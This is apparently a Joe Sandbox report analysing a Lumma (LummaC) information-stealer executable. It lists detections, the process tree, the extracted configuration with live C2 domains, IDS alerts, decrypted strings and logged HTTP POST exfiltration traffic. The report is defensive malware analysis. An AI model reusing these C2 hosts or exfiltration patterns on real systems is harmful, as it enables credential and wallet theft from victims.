Edit tour

Windows Analysis Report
1fxm3u0d.exe

Overview

General Information

Sample name:	1fxm3u0d.exe
Analysis ID:	1577311
MD5:	2ca092d4c58d496d25e1238185d31b6e
SHA1:	e06646a559cd47d169926ed515644d4ca78feec2
SHA256:	cd84eee729821ff54b7a766713b7b582005c91e34f7ca9f77e7dc121e14f6493
Tags:	18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

1fxm3u0d.exe (PID: 4368 cmdline: "C:\Users\user\Desktop\1fxm3u0d.exe" MD5: 2CA092D4C58D496D25E1238185D31B6E)

conhost.exe (PID: 2584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

1fxm3u0d.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\1fxm3u0d.exe" MD5: 2CA092D4C58D496D25E1238185D31B6E)

WerFault.exe (PID: 3948 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 304 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["goalyfeastz.site", "thighpecr.cyou", "servicedny.site", "authorisev.site", "faulteyotk.site", "dilemmadu.site", "contemteny.site", "opposezmny.site", "seallysl.site"], "Build id": "FATE99--Unique"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2280589839.0000000003405000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 1fxm3u0d.exe PID: 6596	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 1fxm3u0d.exe PID: 6596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:33:02.147349+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	23.55.153.106	443	TCP
2024-12-18T11:33:04.632141+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.66.86	443	TCP
2024-12-18T11:33:10.402197+0100	2028371	3	Unknown Traffic	192.168.2.5	49712	104.21.66.86	443	TCP
2024-12-18T11:33:12.986476+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	104.21.66.86	443	TCP
2024-12-18T11:33:16.870175+0100	2028371	3	Unknown Traffic	192.168.2.5	49718	104.21.66.86	443	TCP
2024-12-18T11:33:19.509209+0100	2028371	3	Unknown Traffic	192.168.2.5	49724	104.21.66.86	443	TCP
2024-12-18T11:33:21.982900+0100	2028371	3	Unknown Traffic	192.168.2.5	49731	104.21.66.86	443	TCP
2024-12-18T11:33:24.402351+0100	2028371	3	Unknown Traffic	192.168.2.5	49738	104.21.66.86	443	TCP
2024-12-18T11:33:30.409861+0100	2028371	3	Unknown Traffic	192.168.2.5	49758	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:33:08.830259+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49708	104.21.66.86	443	TCP
2024-12-18T11:33:11.438395+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49712	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:33:08.830259+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49708	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:33:11.438395+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49712	104.21.66.86	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:33:00.036959+0100	2057071	1	Domain Observed Used for C2 Detected	192.168.2.5	49546	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (contemteny .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:32:59.349775+0100	2057077	1	Domain Observed Used for C2 Detected	192.168.2.5	59548	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dilemmadu .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:32:59.578043+0100	2057079	1	Domain Observed Used for C2 Detected	192.168.2.5	64227	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (faulteyotk .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:32:59.810077+0100	2057083	1	Domain Observed Used for C2 Detected	192.168.2.5	65373	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (goalyfeastz .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:32:59.131332+0100	2057085	1	Domain Observed Used for C2 Detected	192.168.2.5	51538	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (opposezmny .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:32:58.902357+0100	2057089	1	Domain Observed Used for C2 Detected	192.168.2.5	54162	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:32:58.679311+0100	2057093	1	Domain Observed Used for C2 Detected	192.168.2.5	55811	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (servicedny .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:33:00.354666+0100	2057095	1	Domain Observed Used for C2 Detected	192.168.2.5	55120	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thighpecr .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:32:58.450789+0100	2057097	1	Domain Observed Used for C2 Detected	192.168.2.5	56695	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:33:18.117298+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49718	104.21.66.86	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:33:24.406261+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49738	104.21.66.86	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:33:02.959840+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49705	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://authorisev.site/api	Avira URL Cloud: Label: phishing
Source: https://faulteyotk.site/api(	Avira URL Cloud: Label: malware
Source: https://servicedny.site/apiP	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["goalyfeastz.site", "thighpecr.cyou", "servicedny.site", "authorisev.site", "faulteyotk.site", "dilemmadu.site", "contemteny.site", "opposezmny.site", "seallysl.site"], "Build id": "FATE99--Unique"}

Multi AV Scanner detection for submitted file

Source: 1fxm3u0d.exe	Virustotal: Detection: 57%			Perma Link
Source: 1fxm3u0d.exe	ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: 1fxm3u0d.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: servicedny.site
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: authorisev.site
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: faulteyotk.site
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: dilemmadu.site
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: contemteny.site
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: goalyfeastz.site
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: opposezmny.site
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: seallysl.site
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: thighpecr.cyou
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2383945955.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: FATE99--Unique

Source: 1fxm3u0d.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49738 version: TLS 1.2

Source: 1fxm3u0d.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001A5898 FindFirstFileExW,		0_2_001A5898
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001A5949 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_001A5949

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057093 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site) : 192.168.2.5:55811 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057085 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (goalyfeastz .site) : 192.168.2.5:51538 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057083 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (faulteyotk .site) : 192.168.2.5:65373 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057077 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (contemteny .site) : 192.168.2.5:59548 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057071 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site) : 192.168.2.5:49546 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057079 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dilemmadu .site) : 192.168.2.5:64227 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057089 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (opposezmny .site) : 192.168.2.5:54162 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057095 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (servicedny .site) : 192.168.2.5:55120 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057097 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thighpecr .cyou) : 192.168.2.5:56695 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49705 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49712 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49712 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49718 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49738 -> 104.21.66.86:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: goalyfeastz.site
Source: Malware configuration extractor	URLs: thighpecr.cyou
Source: Malware configuration extractor	URLs: servicedny.site
Source: Malware configuration extractor	URLs: authorisev.site
Source: Malware configuration extractor	URLs: faulteyotk.site
Source: Malware configuration extractor	URLs: dilemmadu.site
Source: Malware configuration extractor	URLs: contemteny.site
Source: Malware configuration extractor	URLs: opposezmny.site
Source: Malware configuration extractor	URLs: seallysl.site

Source: Joe Sandbox View

IP Address: 23.55.153.106 23.55.153.106

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49758 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49724 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49738 -> 104.21.66.86:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PRD24RZ7ZBNRVVVVVVVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12914Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GQQ2DS1FJFJFFVVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15132Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ESPXYNHJ3ZZNBVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20616Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IFJI9R3F3ZFVVVVVVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1333Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SSHF8DNVNZFFVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569058Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: thighpecr.cyou
Source: global traffic	DNS traffic detected: DNS query: seallysl.site
Source: global traffic	DNS traffic detected: DNS query: opposezmny.site
Source: global traffic	DNS traffic detected: DNS query: goalyfeastz.site
Source: global traffic	DNS traffic detected: DNS query: contemteny.site
Source: global traffic	DNS traffic detected: DNS query: dilemmadu.site
Source: global traffic	DNS traffic detected: DNS query: faulteyotk.site
Source: global traffic	DNS traffic detected: DNS query: authorisev.site
Source: global traffic	DNS traffic detected: DNS query: servicedny.site
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authorisev.site/api
Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
